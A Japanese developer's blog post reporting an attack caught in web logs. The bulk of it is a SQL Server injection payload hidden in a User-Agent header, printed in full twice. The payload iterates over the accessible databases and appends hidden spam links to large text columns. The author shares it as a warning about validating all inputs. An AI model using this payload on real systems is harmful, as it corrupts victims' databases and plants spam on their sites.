masalibの日記

システム開発、運用と猫の写真ブログです

トップ > 超ー怖いUSER_AGENT

超ー怖いUSER_AGENT

ログ集計ツールでUSER_AGENTのバイト数エラーがでたので確認したら
クラッキングだった。
バリデーション(入力チェック)かけててよかった

以下UA

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0);declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select NAME from sys.databases where (has_dbaccess(NAME)!=0) and NAME not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style="display:none">abortion pill <a href="http://www.1world2go.com/page/Coupons-Discounts" rel="nofollow">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''abortion pill'''' when 1 then ''''abortion pill'''' else ''''abortion pill'''' end +''''</a> abortion pill</div>'''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--

!!絶対にコピペして実行しないでください!!責任はとりません!! 怖いので一部は全角にしています

整えたバージョン

Mozilla/5.0 (Windows NT 6.1;
 WOW64;
 rv:24.0) Gecko/20100101 Firefox/24.0);
declare @b cursor;
declare @s varchar(8000);
declare @w varchar(99);
set @b=cursor for select DB_NAME() union select NAME from sys.databases where (has_dbaccess(NAME)!=0) and NAME not in ('master','tempdb','model','msdb',DB_NAME());
open @b;
fetch next from @b into @w;
while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';
declare @c cursor;
declare @d varchar(4000);
set @c=cursor for select ''UPDATE [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style="display:none">abortion pill <a href="http://www.1world2go.com/page/Coupons-Discounts" rel="nofollow">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''abortion pill'''' when 1 then ''''abortion pill'''' else ''''abortion pill'''' end +''''</a> abortion pill</div>'''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));
open @c;
fetch next from @c into @d;
while @@FETCH_STATUS=0 begin exec (@d);
fetch next from @c into @d;
end;
close @c end try begin catch end catch';
exec (@s);
fetch next from @b into @w;
end;
close @b--

入力パラメータ(POST,GET)は絶対にチェックしているが USER_AGENTに仕込むなんてハッカーの人は発想がすごいな~